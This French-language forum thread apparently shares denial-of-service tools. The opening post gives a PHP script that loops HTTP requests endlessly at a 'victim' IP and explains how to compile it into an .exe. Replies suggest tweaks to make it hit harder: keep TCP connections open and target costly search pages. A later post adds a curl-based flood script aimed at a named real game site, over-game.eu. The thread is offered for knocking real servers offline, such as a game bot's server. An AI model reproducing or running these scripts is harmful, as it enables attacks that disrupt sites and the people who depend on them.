Sign in to follow this  
Nikorwell

Je DDoS, Tu DDoS, Il... les doigts dans le nez !

10 posts in this topic

Un rêve pour certains de DDoSer comme un malade et down un site/serveur ?

Je vous aime, alors je vous donne =)

 

Voici un script PHP, simple, qui n'utilise pas votre FireFox, IE ou quoi que ce soit d'autre. Et pourquoi c'est le meilleur script pour Owned ? Parce qu'il n'a aucune limite dans son code.

 

___________________________

1/ Téléchargez BamCompile ICI

 

attachment.php?attachmentid=79&stc=1&d=1298373885

2/ Allez dans examples/phpinfo/phpinfo.php et retirez TOUT le code, puis remplacez le par :

><?php

function init(){
echo 'Initialisation en cours...';
set_time_limit(0);
$i = '0';
echo 'OK.';
}

function ptpget($site){
echo 'Envoi des requêtes sur '.$site.'';
while (true){
	$fp = fsockopen($site, 80);
	fputs($fp, "GET /index.php HTTP/1.1\r\n");
	fputs($fp, "Host: [color="Red"]IP DU SITE DE VOTRE VICTIME[/color]\r\n\r\n");
	fclose($fp);
	$i++;
	echo $i.'|';
}
}

init();
ptpget('IP DU SITE DE VOTRE VICTIME');

?>

3/ Lancez examples/phpinfo/compile.bat

4/ Tadaaa icon10.gif vous avez un en phpinfo.exe qui va apparaitre dans la fichier !

5/ Lancez le .exe ( 4, 5, 6 fenêtre celons la résistance du serveur ).

Si ce que vous voulez owned, c'est du lourd, je vous conseil de demander à un/des ami(s) de le lancer aussi.

 

 

Bonus :

Pour savoir si le site que vous essayez de DDoS est mort :

Down For Everyone Or Just Me -> Check if your website is down or up?

 

 

 

by Nikorwell icon6.gif

Capture.jpg

Share this post


Link to post
Share on other sites

L'idée de faire du PHP pour DoS est intéressante, mais pas forcément la plus efficace.

Certe cela n'utilise pas le navigateur, mais votre serveur PHP, donc c'est toujours votre PC qui trinque. Finalement, peut être que PHP est plus rapide que JS, vu qu'on dirait qu'il est compilé.

Sur quel site as-tu testé ceci ?

Normalement, quand tu fermes le socket, ca ferme la connection avec le serveur distant, qui annule ta requête (mais je suis pas sur ...).

 

Bref je suis sceptique ... Surtout que le DoS brute n'est plus tellement efficace de nos jours, on peut faire plus subtile :)

Share this post


Link to post
Share on other sites

Plus subtile dis-tu, arrête tu m'intéresses <_>

Ce code sert pour les débutants.

 

Pour les pro* il n'a qu'une seule utilisé, DDoS les serveurs comme un malade.

Prend en exemple un bot, bot dofus par exemple, Xvolk's :

Xvolk's a un bot, tu trouves l'IP de son serveur et tu DDoS.

 

C'est vrai que ce DDoS est très temporaire et que le site/serveur déDown rapidement après, mais dans cette exemple du bot par exemple, cela permet de le DDoS au moins quelques secondes, et donc de déconnecter tout le monde si le serveur est lié.

 

Bref c'est vraiment un script débutant, d'où son utilisation simple et sa création rapide.

Share this post


Link to post
Share on other sites

Déja il faut savoir quel est le but du DoS :

- Remplir un maximum de connections TCP pour que le serveur ne puisse pas en accepter d'autres ? Dans ce cas fsockopen suffit, et il ne faut pas faire de fclose.

- Lancer un maximum de requêtes pour saturer les ressources du serveur cible ? Dans ce cas il faudrait changer changer "index.php" en la page la plus consommatrice :P

Par exemple vers une page de recherche, ce sera une requête POST le plus fréquemment.

 

Petite précision :

fputs($fp, "Host: IP DU SITE DE VOTRE VICTIME\r\n\r\n");

Host contient le nom de domaine, et non l'IP du site (surtout dans le cas où on aurait plusieurs sites sur le même serveur : même IP).

 

Niveau subtilité, tu devrais te renseigner sur Apache, le serveur web le plus répandu, mais pas forcément le plus résistant à certaines attaques, qui le ciblent en particulier, sans pour autant monopoliser ta bande passante et ton processeur :)

Share this post


Link to post
Share on other sites

2/ Allez dans examples/phpinfo/phpinfo.php et retirez TOUT le code, puis remplacez le par :

><?php

function init(){
echo 'Initialisation en cours...';
set_time_limit(0);
$i = '0';
echo 'OK.';
}

function ptpget($site){
echo 'Envoi des requêtes sur '.$site.'';
while (true){
	$fp = fsockopen($site, 80);
	fputs($fp, "GET /index.php HTTP/1.1\r\n");
	fputs($fp, "Host: [color="Red"]IP DU SITE DE VOTRE VICTIME[/color]\r\n\r\n");
	fclose($fp);
	$i++;
	echo $i.'|';
}
}

init();
ptpget('IP DU SITE DE VOTRE VICTIME');

?>

Tu as fait une petite erreur dans ton code au niveau de ce n'est pas "Red" mais 'red'

Vu que tu utilise " juste avant host cela ne marcheras pas ;)

Share this post


Link to post
Share on other sites

Le problème là c'est qu'il s'agit d'attaques DoS et non DDoS, et il est très simple te bloquer le nombre de requêtes envoyé par un seul client.

Les méthodes les plus fiables que je connaisse pour DDoS, c'est LOIC ou un réseau de machine zombie.

 

En plus de ça, PHP ne se stoppera pas de lui même? Il fonctionne que pendant un certain temps consécutif (30secondes par défaut je crois). Si l'opération prend trop de temps il arrête d'executer le script pour éviter de ralentir la machine.

Share this post


Link to post
Share on other sites

Hum, ce code plutôt est pour Ddos (par requête post). ;)

 

<?php

 

$url = "http://over-game.eu/";

$times = 50;

$wait = 500;

$attack = 1;

 

 

$footer = "removed";

 

if($attack == 0){

echo "[-] Operation Aborted\n";

} else {

if(ereg("http://(.*)/", $url)){

echo "[+] starting on $url\n";

ddos($url, $times, $wait);

} else {

echo "[-] Invalid url\n";

}

}

 

function ddos($url, $times, $wait){

for($i = 0;$i

sleep($wait);

$ch = curl_init($url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$do = curl_exec($ch);

if($do){

echo "[+][$i] Attacked :: $url\n";

curl_close($ch);

} else {

echo "[-][$i] Error :: $url\n";

curl_close($ch);

}

flush();

}

echo "[+]=- Done! -=[+]\n";

echo "Jacks -- \n$footer";

}

?>

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this